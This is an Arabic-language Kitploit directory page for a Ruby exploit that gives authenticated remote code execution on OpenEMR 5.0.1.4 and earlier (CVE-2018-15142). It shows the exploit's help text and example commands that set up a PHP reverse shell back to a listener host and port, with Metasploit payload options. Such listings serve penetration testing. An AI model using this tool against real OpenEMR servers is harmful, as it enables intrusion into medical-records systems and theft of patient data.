Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
OpenEMR-RCE — OpenEMR <= 5.0.1 - (بعد المصادقة) تنفيذ الكود عن بُعد | Kitploit
أدوات/GitHubGitHub/noraj/openemr-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubnoraj/openemr-rce

OpenEMR-RCE

OpenEMR <= 5.0.1 - (بعد المصادقة) تنفيذ الكود عن بُعد

عرض المستودع
8منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

استغلال OpenEMR لتنفيذ التعليمات البرمجية عن بُعد / إثبات المفهوم

OpenEMR <= 5.0.1.4 - تنفيذ تعليمات برمجية عن بُعد (يتطلب مصادقة)

استغلال لـ CVE-2018-15142.

[EDB-49486] [PacketStorm] [WLB-2020080011]

الاستخدام

root@kitploit:~
$ ruby exploit.rb --help
OpenEMR <= 5.0.1.4 - (Authenticated) Remote Code Execution

Usage:
  exploit.rb manual --root-url <url> --shell <filename> --user <username> --password <password> [--debug]
  exploit.rb semi-auto --root-url <url> --user <username> --password <password> --payload <payload> --lhost <host> --lport <port> [--debug]
  exploit.rb auto --root-url <url> --user <username> --password <password> --lhost <host> --lport <port> [--debug]
  exploit.rb -H | --help

Options:
  -r <url>, --root-url <url>            Root URL (base path) including HTTP scheme, port and root folder
  -s <filename>, --shell <filename>     Filename of the PHP reverse shell payload
  -u <username>, --user <username>      Username of the admin
  -p <password>, --password <password>  Password of the admin
  -m <payload>, --payload <payload>     Metasploit PHP payload
  -h <host>, --lhost <host>             Reverse shell local host
  -t <port>, --lport <port>             Reverse shell local port
  --debug                               Display arguments
  -H, --help                            Show this screen

Examples:
  exploit.rb manual -r http://example.org/openemr -s myRevShell.php -u admin -p pass123
  exploit.rb semi-auto -r http://example.org:8080/openemr -u admin_emr -p qwerty2020 -m 'php/reverse_php' -h 10.0.0.2 -t 8888
  exploit.rb auto -r https://example.org:4443 -u admin_usr -p rock5 -h 192.168.0.2 -t 9999

الأوضاع

  • تلقائي: أنت تعرف الهدف ويكون المستمع (listener) الخاص بك جاهزًا، دع الاستغلال يتولى الباقي
  • شبه تلقائي: نفس الوضع التلقائي لكنك تريد تحديد حمولة (payload) أخرى غير الافتراضية php/reverse_php
  • يدوي: لديك بالفعل قشرة عكسية PHP مخصصة، ويتيح لك الاستغلال تحديدها

المتطلبات

  • httpclient
  • docopt.rb
  • (اختياري) Metasploit Framework (msfvenom لتوليد القشرة العكسية في الوضعين التلقائي وشبه التلقائي)

مثال لنظام BlackArch:

root@kitploit:~
pacman -S ruby-httpclient ruby-docopt metasploit

مثال باستخدام gem:

root@kitploit:~
gem install httpclient docopt

المرجع

هذه إعادة كتابة محسّنة لـ EDB-ID-48515 وتنفيذٌ للجزء الثاني من EDB-ID-45202:

  • استخدام وسائط (بدلًا من القيم الثابتة في الكود)
  • إتاحة قشرة عكسية PHP مخصصة أو توليد واحدة تلقائيًا عبر msfconsole
  • أنظف وأكثر قابلية للتخصيص
  • استخدام روبي (بايثون 2 لم يعد مدعومًا)

تم اختبار هذا الاستغلال باستخدام روبي 2.7.1.

حول EDB-ID-48515:

root@kitploit:~
Exploit Author: Musyoka Ian
Date: 2020-05-25
Vendor Homepage: https://www.open-emr.org/
Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz
Dockerfile: https://github.com/haccer/exploits/blob/master/OpenEMR-RCE/Dockerfile 
Version: < 5.0.1 (Patch 4)
Tested on: Ubuntu LAMP, OpenEMR Version 5.0.1.3
References: https://medium.com/@musyokaian/openemr-version-5-0-1-remote-code-execution-vulnerability-2f8fd8644a69
تنزيل الأداة